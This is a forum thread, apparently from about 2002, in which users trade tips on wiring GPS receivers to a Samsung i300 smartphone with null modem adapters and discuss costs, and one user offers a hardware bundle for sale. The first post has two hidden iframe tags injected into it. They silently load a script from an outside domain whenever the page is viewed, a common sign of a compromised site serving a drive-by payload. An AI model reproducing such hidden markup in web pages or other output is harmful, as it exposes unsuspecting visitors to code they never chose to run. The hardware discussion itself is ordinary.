+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: GPS on the I300

GPS Software?????

is there a GPS software that would work through the phone not a unit. if not how would you connect the GPS to the i300<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Jeff Werner
    Body Works Studio
    bodyworks@bigvaluezone.com
    http://www.bigvaluezone.com/bodyworks
    Phone - 781-367-6081

Administrator

Arrow

the phone does not have gps software in it,

but if you look at this thread and specifically njb42's posts, you will see what he did for the 6035.. should hold true for the i300...

hth!

I've got the Delorme Solus map system on my I300. Their website, www.delorme.com features downloadable maps and the like. I have not taken advantage of the GPS feature offerred but it seems to be a good system.

widow's son
    Does the i300 have GPS hardware in it?

I know the claim is that all cellular devices will soon enough, but it's difficult to discern who in this thread is discussing the use of hardware devices connected to the i300 and who is just talking about software you can load on it to use existing i300 GPS hardware.

The Delorme software functions with the I300 after purchasing the addt'l hardware.

GPS on the I300

I just got off the line with a guy at www.Delorme.com inquiring whether their GPS hardware and software were compatible with the I300. The software, which I have, is compatible. According to them, they don't feel the need to manufacture a compatible cable for the I300 since not enough I300 owners want GPS.

He is sorely mistaken.

The gentleman was very adament about us emailing the company asking for I300 hardware. He indicated a letter was not necessary, but a note would do.

Their email address is suggest@delorme.com From time to time GPS comes up and here is a way to get it without dealing with Samsung.

maybe we should post a poll here and send him the results....?

Brooks

Please participate in the GPS poll as my contact at DeLorme GPS has requested the results and could persuade them to offer their product for the I300.

The poll can be found here.
    Last edited by mjorange; 01-25-2002 at 02:39 PM.

Lightbulb I300 and GPS

You do not necessarily need a custom made GPS cable. I used a gender changer and null modem adaptor to connect my Garmin Street Pilot's data cable to a Palm hotsync cable (essentially a portable substitute for the cradle) and it worked just fine. I don't have an I300 Hotsync cable yet, but I am sure it will work just as well.

Fab.

Delorme GPS

Today I wandered In to work (CompUSA) to test the Delorme GPS unit on my phone,

IT WORKED

I borrowed the demo unit we have there took a serial data cable out of the package, and hooked it up.

The signal was very weak but I atribute that to the fact that CompUSA doesnt have a db9-male/male null modem adapter to go between the gps and the data cable, so I had to assemble a Gender Changer (db9-male/db25 female) to a null modem adapter(db25-male/db25-female) to a gender changer (db25-male/db25-male) to a gender changer (db25-female/db9-female) to do the same thing as a 9 to 9 pin female to female null modem adapter.

I think that with a real null modem adapter it will work fine.
    Gamefixx.com, A hardcore membership can save you big money

Platinum Member
    Interesting.

Can you be more specific? What did you connect to the phone (which Samsung accesory)?, I guess you connected that to your improvised null modem, and the DeLorme GPS serial cable to the null modem. Is that right?

What do you mean by "it worked"? Did you try it with a particular application? What results did you get?

gps

the conections works like this:

i300 -- serial data cable(for i300) -- null modem (db9-male/male) -- delorme gps.

It did work, it took about 5 min to locate three sats to triangulate off of, but I was successful in gaining my location. however the transfer was lost when I started to move around. I think the signal degridation from the four adapters I had caused the problem. With a single null modem cable I think it will work just fine. I will find out tomarrow..

I tried it with Solus, the delorem mapping software for PalmOS
    Last edited by Spokane(CUSA); 02-27-2002 at 05:53 PM.

Administrator

Arrow

yes this does work with the i300.. this was a frequent setup with the 6035 and the delormes and solus software. if you had just that one connector, you would have gotten a beter signal... stil, post your works and give us a cost point for the stuff you will need. i have a compusa here!

delorme

any one interested in getting the delorme GPS can rest asure that it will work. although it dose require a special adapter.
    when ataching the serial data cable to the gps you need a special null modem cable. It requires an adapter similar to a 25-25 null modem cable. however you would need one that is db9-db9 male/male, you can assemble one using four different adapters as I have mentioned in a poat earlyier in this thead, or I have produced a single adapter that does the samething with much less siugnal degridation. CompUSA and BestBuy would sell the four adaptors for 13.99 each I can build and sell each adapter for a lot chaper.

anyone interested can contact me and I will sell them the GPS, the data cable and the special adaptor for $230

that includes the GPS that sells for 199 at CompUSA as well as the highquality adapter free of signal degridation and the i300 data cable.

let me know if your interested.

Originally posted by Marctronixx
    yes this does work with the i300.. this was a frequent setup with the 6035 and the delormes and solus software. if you had just that one connector, you would have gotten a beter signal... stil, post your works and give us a cost point for the stuff you will need. i have a compusa here!
    cost point for the whole sha-bang

delorme gps, $159-199 (199 includes palm software)
    i300 data cable $69.99 @ CompUSA $49.99 online
    Solus Pro $39.99 (Palm Software)
    custom adapter $35 (notavailable at comp)
    Comp can offer an adapter, to be accurate four adapters all full of signal degridation for 13.99 each X 4 = $55.96

my god what a mark up invoice cost is $1.40 each X 4 = $5.60

Administrator

Arrow

sounds good.. will you charge a flat rate for shipping all these items? can you give an idea on shipping costs (rough est. will be fine if you dont know for sure) and the turnaround time for this package? you have a paypal acct: setup?

mobile GOD

Thumbs up I have GPS working on i300!

I am using Rand McNally Streetfinder for Palm OS, but instead of that Magellan sled for Palm V/Vx form-factor thats OEM with it, I bought the one for hooking to a PC's serial port.

Then I bought the serial data cable for the i300 from Samsung's website.

Connected it all together with a male-to-male DB9 serial connector and null-modem connector, both bought at Radio Shack for less than $5.

Adapter Won't Matter To Signal Strength

Changing from a collection of adapters and cables to a single 9/9 null modem won't change your signal strength any. That's all in the GPS receiver ONLY.

If you don't give a good starting location to the EarthMate GPS receiver i've found it can take a very long time for it to sync up, if it ever does at all.

DLD

Originally posted by Marctronixx
    sounds good.. will you charge a flat rate for shipping all these items? can you give an idea on shipping costs (rough est. will be fine if you dont know for sure) and the turnaround time for this package? you have a paypal acct: setup?
    Unlike software developers who need to make money off of there product to survive I could provide the pin layout to anyone who reqests it for free. The cable adapter would be no more than $10 at any specialty computer cableing store.

Any of the other hardware and software could be found at any computer store or special order online

To conclude how the experimemt went. I had a special adapter made and tried it out in the parking lot at the cabling store. It worked well, however after I finished up there I headed back to work, and was unable to get a location all the way there, I was recieving signal, however never one strong enough.

I think I will return the GPS and Buy one that is a stand alone unit. I use a GPS a lot and I dont believe that the i300 battery woyuld hold out through the entire hiking trip or boating excursion.

I need help.

I'am trying to attach my old magellan gps 3000 to my phone. I have the Delorme software XMap® Handheld Street Atlas USA® Edition. I have my gps receiver going to a null modem adapter than to my cradle. But when the program tries to seek out the gps it cannot find it. I have messed with nmea setting on my gps receiver. I have tried other programs to help find the gps and they cannot find it either. Are the pins the same on the i300 like the rx and tx. On my gps they are pin 2 is transmit and pin 3 receive and pin 5 is ground. If anyone could help me.